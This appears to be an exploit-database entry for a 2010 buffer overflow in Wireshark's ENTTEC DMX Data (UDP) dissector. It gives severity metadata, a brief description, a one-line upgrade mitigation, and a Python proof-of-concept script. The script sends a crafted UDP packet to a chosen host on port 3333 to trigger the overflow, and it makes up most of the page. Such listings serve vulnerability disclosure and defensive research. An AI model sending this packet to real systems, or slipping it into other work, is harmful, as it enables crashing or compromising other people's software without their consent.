header-logo
Suggest Exploit
vendor:
ENTTEC DMX Data (UDP)
by:
non-customers crew
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: ENTTEC DMX Data (UDP)
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC

Wireshark ENTTEC DMX Data (UDP) is prone to a buffer overflow vulnerability when sending a specially crafted packet to the vulnerable service. This vulnerability can be exploited by an attacker to execute arbitrary code in the context of the application. This vulnerability was discovered by non-customers crew in 2010.

Mitigation:

Upgrade to the latest version of Wireshark ENTTEC DMX Data (UDP) to mitigate this vulnerability.
Source

Exploit-DB raw data:

# source: https://www.securityfocus.com/bid/45634/info

#!/usr/bin/env python

# Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC
# by non-customers crew in 2010
# http://rock-madrid.com/

import socket, sys

try:
  host = sys.argv[1]
except:
  print "usage: " + sys.argv[0] + " <host>"
  sys.exit(2)

port = 3333
addr = (host, port)

data  = "ESDD\x10\x20\x04"
data += "\x00\x0c"
data += "\xfe\xff\x41"
data += "\xfe\xff\x42"
data += "\xfe\xff\x43"
data += "\xfe\xff\x44"

udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
  udps.sendto(data, addr)
except:
  print "can't lookup host"
  sys.exit(1)

udps.close()
sys.exit(0)

Navigation

Suggest Exploit

Services By CQR